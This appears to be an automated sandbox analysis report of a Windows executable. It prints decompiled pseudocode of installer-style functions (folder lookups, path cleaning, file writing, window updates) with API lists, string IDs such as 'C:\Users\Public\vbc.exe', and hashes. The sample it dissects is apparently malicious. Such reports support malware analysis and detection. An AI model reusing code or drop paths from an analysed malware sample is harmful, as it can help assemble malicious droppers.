					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405BBA(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422ee0;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x425000;
							E00405B98(_t86, (_t95 << 0xa) + 0x425000);
						} else {
							E00405AF6(_t86,  *0x423f48);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405DFA(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423fc4;
						if( *0x423fc4 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423f44; // 0x74631528
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423f48,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423f48,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423f78;
							E00405A7F(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423f78, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405BBA(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B98(_a4, _t37);
			}






























                                                0x00405bba
                                                0x00405bba
                                                0x00405bba
                                                0x00405bc0
                                                0x00405bc5
                                                0x00405bc7
                                                0x00405bd6
                                                0x00405bd6
                                                0x00405bd8
                                                0x00405be1
                                                0x00405be3
                                                0x00405be8
                                                0x00405beb
                                                0x00405bec
                                                0x00405bf3
                                                0x00405bf5
                                                0x00405bfb
                                                0x00405bfe
                                                0x00405bfe
                                                0x00405dd7
                                                0x00405dd7
                                                0x00405ddb
                                                0x00000000
                                                0x00000000
                                                0x00405c0b
                                                0x00405c11
                                                0x00000000
                                                0x00000000
                                                0x00405c17
                                                0x00405c18
                                                0x00405c1b
                                                0x00405c1e
                                                0x00405dca
                                                0x00405dd4
                                                0x00405dd6
                                                0x00405dd6
                                                0x00405dcc
                                                0x00405dce
                                                0x00405dd0
                                                0x00405dd1
                                                0x00405dd1
                                                0x00000000
                                                0x00405dca
                                                0x00405c24
                                                0x00405c28
                                                0x00405c38
                                                0x00405c3c
                                                0x00405c43
                                                0x00405c46
                                                0x00405c4a
                                                0x00405c50
                                                0x00405c53
                                                0x00405c56
                                                0x00405c59
                                                0x00405d74
                                                0x00405d77
                                                0x00405da7
                                                0x00405daa
                                                0x00405daf
                                                0x00405db3
                                                0x00405db3
                                                0x00405db8
                                                0x00405db9
                                                0x00405dbe
                                                0x00405dc1
                                                0x00405dc3
                                                0x00000000
                                                0x00405dc3
                                                0x00405d79
                                                0x00405d7c
                                                0x00405d91
                                                0x00405d98
                                                0x00405d7e
                                                0x00405d85
                                                0x00405d85
                                                0x00405da0
                                                0x00405da3
                                                0x00405d6c
                                                0x00405d6d
                                                0x00405d6d
                                                0x00000000
                                                0x00405da3
                                                0x00405c61
                                                0x00405c62
                                                0x00405c68
                                                0x00405c6a
                                                0x00405c84
                                                0x00405c84
                                                0x00405c8b
                                                0x00405c8b
                                                0x00405c92
                                                0x00405c96
                                                0x00405c96
                                                0x00405c97
                                                0x00405c99
                                                0x00405cd2
                                                0x00405cd5
                                                0x00405ce5
                                                0x00405ce8
                                                0x00405cf0
                                                0x00405cf6
                                                0x00405cf6
                                                0x00405d52
                                                0x00405d52
                                                0x00405d54
                                                0x00000000
                                                0x00000000
                                                0x00405cfa
                                                0x00405d01
                                                0x00405d02
                                                0x00405d04
                                                0x00405d1e
                                                0x00405d2c
                                                0x00405d32
                                                0x00405d34
                                                0x00405d4f
                                                0x00405d4f
                                                0x00405d4f
                                                0x00000000
                                                0x00405d4f
                                                0x00405d3a
                                                0x00405d45
                                                0x00405d4b
                                                0x00405d4d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405d4d
                                                0x00405d06
                                                0x00405d09
                                                0x00000000
                                                0x00000000
                                                0x00405d18
                                                0x00405d1a
                                                0x00405d1c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405d1c
                                                0x00000000
                                                0x00405d52
                                                0x00405cdd
                                                0x00000000
                                                0x00405c9b
                                                0x00405ca0
                                                0x00405cb6
                                                0x00405cbb
                                                0x00405cbe
                                                0x00405d5b
                                                0x00405d5b
                                                0x00405d5f
                                                0x00405d67
                                                0x00405d67
                                                0x00000000
                                                0x00405d5f
                                                0x00405cc8
                                                0x00405d56
                                                0x00405d56
                                                0x00405d59
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405d59
                                                0x00405c99
                                                0x00405c6c
                                                0x00405c70
                                                0x00000000
                                                0x00000000
                                                0x00405c72
                                                0x00405c76
                                                0x00000000
                                                0x00000000
                                                0x00405c78
                                                0x00405c7c
                                                0x00000000
                                                0x00405c7e
                                                0x00405c7e
                                                0x00000000
                                                0x00405c7e
                                                0x00405c7c
                                                0x00405de1
                                                0x00405deb
                                                0x00405df7
                                                0x00405df7
                                                0x00000000

                                                APIs
                                                • GetVersion.KERNEL32(00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405C62
                                                • GetSystemDirectoryA.KERNEL32(pnzipglt,00000400), ref: 00405CDD
                                                • GetWindowsDirectoryA.KERNEL32(pnzipglt,00000400), ref: 00405CF0
                                                • SHGetSpecialFolderLocation.SHELL32(?,0040F0E0), ref: 00405D2C
                                                • SHGetPathFromIDListA.SHELL32(0040F0E0,pnzipglt), ref: 00405D3A
                                                • CoTaskMemFree.OLE32(0040F0E0), ref: 00405D45
                                                • lstrcatA.KERNEL32(pnzipglt,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D67
                                                • lstrlenA.KERNEL32(pnzipglt,00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405DB9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$pnzipglt
                                                • API String ID: 900638850-3776897928
                                                • Opcode ID: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                                • Instruction ID: c09fc2b2839bb59ef3d9b0e1161cb0e194e2e056f91f07e7f33828596fbb00b3
                                                • Opcode Fuzzy Hash: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                                • Instruction Fuzzy Hash: CE51F331A04A05AAEF215F648C88BBF3B74EF05714F10827BE911B62E0D27C5942DF5E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 10003A80, Relevance: 16.7, APIs: 11, Instructions: 154fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CreateErrorFileLast$CloseHandle
                                                • String ID:
                                                • API String ID: 3924142190-0
                                                • Opcode ID: d12f181800eb8c19918e4139051a8d3be48e902166dd29db6573b9f49fbd6db8
                                                • Instruction ID: b2d0b2de5821d68271a41f9e2dfa233027f279bb11c678953abce689e22d6745
                                                • Opcode Fuzzy Hash: d12f181800eb8c19918e4139051a8d3be48e902166dd29db6573b9f49fbd6db8
                                                • Instruction Fuzzy Hash: AF71A0B490435A8FEB00DFA8C58879EBBF0FB48354F10892EE855A7384D7759A44CF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 100025C0, Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 321COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: W$decode failure: data corruption or bug.$z
                                                • API String ID: 0-3221231465
                                                • Opcode ID: 9d18f4b18fd6c1e578f0888356f88911b46e24024ad03cbe1d703a5328ba0373
                                                • Instruction ID: c5430aa4c463919f0ea362af26aa6ff43b67475c375dbb6a15b9f8237f04ba1c
                                                • Opcode Fuzzy Hash: 9d18f4b18fd6c1e578f0888356f88911b46e24024ad03cbe1d703a5328ba0373
                                                • Instruction Fuzzy Hash: 52F1A174E0520ACFEB14DF98C585A9EBBF1FF48394F218429E859A7354C734A981CF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405DFA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405DFA(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056F8(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004056B6("*?|<>/\":", _t5))) == 0) {
							E00405830(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                0x00405dfc
                                                0x00405e04
                                                0x00405e18
                                                0x00405e18
                                                0x00405e1e
                                                0x00405e2b
                                                0x00405e2b
                                                0x00405e2c
                                                0x00405e2e
                                                0x00405e32
                                                0x00405e34
                                                0x00405e3d
                                                0x00405e3f
                                                0x00405e59
                                                0x00405e61
                                                0x00405e61
                                                0x00405e66
                                                0x00405e68
                                                0x00405e6a
                                                0x00405e6e
                                                0x00405e6f
                                                0x00405e72
                                                0x00405e7a
                                                0x00405e7c
                                                0x00405e80
                                                0x00000000
                                                0x00000000
                                                0x00405e86
                                                0x00405e8b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405e8b
                                                0x00405e90

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: "C:\Users\Public\vbc.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-1374994687
                                                • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                • Instruction ID: 8fb4f4a5a46673644b6d17db89182f96b33943a1441b7055d0135b6347a17e40
                                                • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                • Instruction Fuzzy Hash: 0411B971804A9029EB321734DC44B7B7F88CB9A7A0F18447BD9D4722C2D67C5E429BED
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403EBB, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00403EBB(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                0x00403ecd
                                                0x00403f61
                                                0x00000000
                                                0x00403f61
                                                0x00403ede
                                                0x00403ee2
                                                0x00000000
                                                0x00000000
                                                0x00403ee8
                                                0x00403ef1
                                                0x00403ef4
                                                0x00403ef4
                                                0x00403efa
                                                0x00403f00
                                                0x00403f00
                                                0x00403f0c
                                                0x00403f12
                                                0x00403f19
                                                0x00403f1c
                                                0x00403f1f
                                                0x00403f21
                                                0x00403f21
                                                0x00403f29
                                                0x00403f2f
                                                0x00403f2f
                                                0x00403f39
                                                0x00403f3e
                                                0x00403f41
                                                0x00403f46
                                                0x00403f49
                                                0x00403f49
                                                0x00403f59
                                                0x00403f59
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                • Instruction ID: 51638b03811fbd3f25a4eb1d810876b9f584da0c3187da66c7daa715c1b02470
                                                • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                • Instruction Fuzzy Hash: 08218471904745ABCB219F78DD08B4BBFF8AF05715B048629F856E22E0D734E904CB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E004026AF(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A29(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E004056F8(_t52) == 0) {
					E00402A29(0xffffffed);
				}
				E00405850(_t52);
				_t27 = E0040586F(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423f54; // 0x8200
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030B3(_t47);
						E00403081(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E00405830( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                0x004026af
                                                0x004026b1
                                                0x004026bd
                                                0x004026c0
                                                0x004026ca
                                                0x004026ce
                                                0x004026ce
                                                0x004026d4
                                                0x004026e1
                                                0x004026e9
                                                0x004026ec
                                                0x004026f2
                                                0x00402700
                                                0x00402705
                                                0x00402709
                                                0x0040270c
                                                0x00402715
                                                0x00402721
                                                0x00402725
                                                0x00402728
                                                0x00402732
                                                0x00402751
                                                0x00402739
                                                0x0040273e
                                                0x00402746
                                                0x00402749
                                                0x0040274e
                                                0x0040274e
                                                0x00402758
                                                0x00402758
                                                0x0040276a
                                                0x00402771
                                                0x00402783
                                                0x00402783
                                                0x00402789
                                                0x00402789
                                                0x00402794
                                                0x00402795
                                                0x00402799
                                                0x0040279d
                                                0x004027a3
                                                0x004027a3
                                                0x004027aa
                                                0x00402197
                                                0x004028c1
                                                0x004028cd

                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00008200,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                                • GlobalFree.KERNEL32(?), ref: 00402758
                                                • WriteFile.KERNEL32(?,00000000,?,?), ref: 0040276A
                                                • GlobalFree.KERNEL32(00000000), ref: 00402771
                                                • CloseHandle.KERNEL32(?), ref: 00402789
                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                • String ID:
                                                • API String ID: 3294113728-0
                                                • Opcode ID: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                                • Instruction ID: c2c7835655fcdbd4aa1197060f7bd229eae72b48ff88aadc8082708ad166979d
                                                • Opcode Fuzzy Hash: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                                • Instruction Fuzzy Hash: 9A31AD71C00128BBCF216FA5DE88DAEBA79EF04364F14423AF924762E0C67949418B99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404E84, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00404E84(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423724; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423ff4; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BBA(0, _t39, 0x41fd10, 0x41fd10, _a4);
					}
					_t26 = lstrlenA(0x41fd10);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423708, 0x41fd10);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fd10;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fd10)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fd10, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                0x00404e8a
                                                0x00404e96
                                                0x00404e99
                                                0x00404e9f
                                                0x00404eab
                                                0x00404eae
                                                0x00404eb1
                                                0x00404eb7
                                                0x00404eb7
                                                0x00404ebd
                                                0x00404ec5
                                                0x00404ec8
                                                0x00404ee5
                                                0x00404ee9
                                                0x00404ef2
                                                0x00404ef2
                                                0x00404efc
                                                0x00404f05
                                                0x00404f11
                                                0x00404f18
                                                0x00404f1c
                                                0x00404f1f
                                                0x00404f32
                                                0x00404f40
                                                0x00404f40
                                                0x00404f44
                                                0x00404f46
                                                0x00404f49
                                                0x00000000
                                                0x00404f49
                                                0x00404eca
                                                0x00404ed2
                                                0x00404eda
                                                0x00404ee0
                                                0x00000000
                                                0x00404ee0
                                                0x00404eda
                                                0x00404ec8
                                                0x00404f53

                                                APIs
                                                • lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                • lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                • lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                • SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                • SendMessageA.USER32 ref: 00404F18
                                                • SendMessageA.USER32 ref: 00404F32
                                                • SendMessageA.USER32 ref: 00404F40
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID:
                                                • API String ID: 2531174081-0
                                                • Opcode ID: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                                • Instruction ID: 29716f0e6f05b21b32fe67f81276caf5577c11483a64657c7043e00463a136c9
                                                • Opcode Fuzzy Hash: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                                • Instruction Fuzzy Hash: 21218EB1900118BBDF119FA5DC849DFBFB9FB44354F10807AF904A6290C7789E418BA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404753, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00404753(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                0x00404761
                                                0x0040476e
                                                0x00404774
                                                0x004047b2
                                                0x004047b2
                                                0x004047c1
                                                0x004047c8
                                                0x00000000
                                                0x004047ca
                                                0x00404776
                                                0x00404785
                                                0x0040478d
                                                0x00404790
                                                0x004047a2
                                                0x004047a8
                                                0x004047af
                                                0x00000000
                                                0x004047af
                                                0x00000000

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
